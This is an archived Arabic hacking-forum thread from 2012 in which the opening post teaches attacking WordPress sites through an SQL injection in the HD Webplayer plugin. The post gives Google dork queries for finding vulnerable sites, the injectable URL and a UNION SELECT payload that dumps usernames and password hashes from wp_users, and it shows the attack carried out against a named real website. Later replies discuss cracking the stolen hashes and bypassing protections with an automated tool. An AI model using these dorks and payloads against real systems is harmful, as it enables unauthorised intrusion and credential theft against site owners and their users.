أستغلال ثغرات واختراقها WordPress [الأرشيف]

مشاهدة النسخة كاملة : أستغلال ثغرات واختراقها WordPress

خبوش

09-03-2012, 05:40 AM

السلام عليكم ورحمة الله وبركاته

وصف لسكربت
WordPress (http://ar.wordpress.com/)

سكربت ممل سكربت يسبب لك الخطر بموقعك وهو يجيب لك راس منتدى بنسبة 100% على سيرفر عام
ماهي أشهر ثغراته المصاب بها ثغرات الحقن .

يالله فداكم ثغرة . :
الاصدار المصاب : Webplayer 1.1
نوع الثغرة : تثغرة ٍ حقن الي ما يعرف يحقن يدوي يستخدم الهافج

دورك في محرك البحث قوقل
1
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

2
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

3
inurl:"/wp-content/plugins/hd-webplayer/"

---------------------------------------

هذا رابط الاستغلال xxxx.com/vb//plugins/hd-webplayer/playlist.php?videoid=

تستبدل xxxx برابط الموقع

تستبدل vb بمسار السكربت

------------------------

هذا استغلال الحقن اليدوي

playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID*0x3a*user_login*0x3a*user_pass*0x 3b)*2*3*4*5*6*7+from+wp_users //Number of columns may be different

المهم

تابع الشرح المصور

انا اخترت الهدف هذا

http://metodistadesuzano.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=4

http://im14.gulfup.com/2012-09-01/1346478290331.png

http://im14.gulfup.com/2012-09-01/1346478290222.png

http://im14.gulfup.com/2012-09-01/1346478290173.png

http://im14.gulfup.com/2012-09-01/134647829024.png

http://im14.gulfup.com/2012-09-01/1346478290405.png

http://im14.gulfup.com/2012-09-01/1346478290696.png

وبكذا أنجزنا المهمه . مسار لوحة التحكم

http://www.example.com/wp-admin

WALEED HaCKeR

09-12-2012, 01:25 AM

يعطيك العافيه .. من يومك مبدع

midotiger228

09-15-2012, 04:12 PM

يوجد كثير من الهاشات لا يوجد لها فك وخاصه التي تبدأ ب $ فهي تسمى one way hashing اي ليس لها فك فلا تضيع وقتك..

Hidden

09-20-2012, 06:07 PM

لا اوافقک الرای ...
یمکن کسرها ببرنامج Password Pro

jok17

09-20-2012, 07:44 PM

يعطيك العافيه

KADEME

09-21-2012, 07:11 PM

شكرا يا أخي . جازاك الله خيرا .

kova-nux

09-23-2012, 02:49 PM

Merciiiiiiiiiiiiii

touita

09-23-2012, 03:33 PM

raw3a akhi barak allah fik

سارة الغامدي

09-25-2012, 08:40 AM

يسلمؤؤؤؤؤؤ ..

zaizo max

09-25-2012, 01:04 PM

الف شكر يبرنس شرح جميل
تقبل مرورى

إذا طُعنت من الخلف >>> فأعلم انك فى المقدمة

هتلر

يارب رحمتك

09-25-2012, 05:27 PM

بارك الله فيك

HaCKer011

09-25-2012, 08:25 PM

جميل جميل جميل :)

JACK5

09-25-2012, 08:42 PM

بارك الله فيك

سبحانك لا علم لنا الا ما علمتنا

مهكره ذوووق

10-01-2012, 11:55 PM

مشكوووووووووووووووور

دمعة شراري

10-02-2012, 12:12 AM

thanksssssssssssssssss

يارب رحمتك

10-02-2012, 12:38 AM

بارك الله فيك

صهيب هكر فلسطين

10-13-2012, 03:55 AM

مبدع اخي وبالتوفيق للجميع

ضلال هكر

10-27-2012, 04:47 AM

الله يعطيك العااافية وشكرا على مجهودك الرائع:redface:

Vegeto

01-30-2013, 11:05 PM

مــــــــــــــــــــــــ ــــــــــــــــــــــــش ـــــــــــــــــــــــــ ــــــكــــــــــــــــــ ـــــور

safi syrian

02-01-2013, 05:03 AM

مشكووور الله يعطيك العافية

sticky 1008

02-01-2013, 07:20 PM

بارك الله فيك على الشرح المبسط لكن المشكلة التي تواجه الجميع هي فك الهاش !!!!!

dark prince

02-02-2013, 06:20 AM

بارك الله فيك
سلمت يداك اخي
مشكورر

mouad ourrad

02-07-2013, 04:04 PM

بس انا نجحت بي حقن الموقع و استخراج الجدوال بس عندما اريد استخراج يورز و ياس يظهر لي خطا اعتقد ان ملف محمي كيف يتم تجاوز حماية و استخراج باس و يورز من برنامج havij
و عندما اريد استخراج يورز و ياس ياتيني هذا الاخطا
Turning on 'bypass illegal union' and retrying
مامشكلة

Tiger Killer

02-07-2013, 05:06 PM

رووووووووعة